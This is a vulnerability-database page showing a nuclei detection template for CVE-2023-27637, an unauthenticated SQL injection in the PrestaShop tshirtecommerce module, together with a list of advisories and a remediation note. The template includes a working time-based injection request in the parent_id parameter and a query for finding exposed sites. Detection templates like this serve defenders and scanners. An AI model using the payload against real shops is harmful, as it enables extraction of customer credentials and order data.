Lucene search
K

PrestaShop `tshirtecommerce` Module - SQL Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 38 Views

PrestaShop tshirtecommerce Module vulnerable to SQL injection, allowing data extraction via API.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2023-27637
22 Mar 202315:35
circl
CNNVD
PrestaShop SQL注入漏洞
22 Mar 202300:00
cnnvd
CVE
CVE-2023-27637
22 Mar 202300:00
cve
Cvelist
CVE-2023-27637
22 Mar 202300:00
cvelist
NVD
CVE-2023-27637
22 Mar 202313:15
nvd
OSV
CVE-2023-27637
22 Mar 202313:15
osv
Prion
Sql injection
22 Mar 202313:15
prion
Positive Technologies
PT-2023-21272 · Prestashop · Tshirtecommerce
22 Mar 202300:00
ptsecurity
RedhatCVE
CVE-2023-27637
23 May 202503:33
redhatcve
VulnCheck KEV
VulnCheck KEV: CVE-2023-27637
21 Mar 202300:00
vulncheck_kev
Rows per page
id: CVE-2023-27637

info:
  name: PrestaShop `tshirtecommerce` Module - SQL Injection
  author: ritikchaddha
  severity: critical
  description: |
    The tshirtecommerce module for PrestaShop is vulnerable to unauthenticated SQL injection via the designer endpoint, allowing attackers to execute arbitrary SQL queries and extract sensitive information from the database.
  impact: |
    Unauthenticated attackers can execute time-based SQL injection through the parent_id parameter in the designer endpoint to extract the complete PrestaShop database including user credentials and order data.
  remediation: |
    Update the tshirtecommerce module to the latest version and apply all security patches.
  reference:
    - https://security.friendsofpresta.org/module/2023/03/21/tshirtecommerce_cwe-89.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-27637
    - https://codecanyon.net/item/prestashop-custom-product-designer/19202018
    - https://tshirtecommerce.com/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-27637
    cwe-id: CWE-89
    epss-score: 0.03299
    epss-percentile: 0.87024
    cpe: cpe:2.3:a:tshirtecommerce:custom_product_designer:2.1.4:*:*:*:*:prestashop:*:*
  metadata:
    max-request: 1
    vendor: tshirtecommerce
    product: custom_product_designer
    framework: prestashop
    fofa-query: body="Prestashop" && body="tshirtecommerce"
  tags: cve,cve2023,prestashop,tshirtecommerce,sqli,time-based-sqli,vkev,vuln

http:
  - raw:
      - |
        @timeout: 30s
        GET /module/tshirtecommerce/designer?product_id=900982561&parent_id=1;SELECT%20SLEEP(8); HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - "duration>=8"
          - "status_code == 200"
          - "contains(tolower(body), 'product not found')"
        condition: and
# digest: 4a0a0047304502201a3aaf7edc4207c4ecefaf6be9e8509b4334b7d0071c13efc3d696df8eb8a751022100b9ec900fa5b445215edfad9e463035a0a70168a19ec7d2bf0451eee3497a11fc:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.4High risk
Vulners AI Score7.4
CVSS 3.19.8
EPSS0.03299
SSVC
38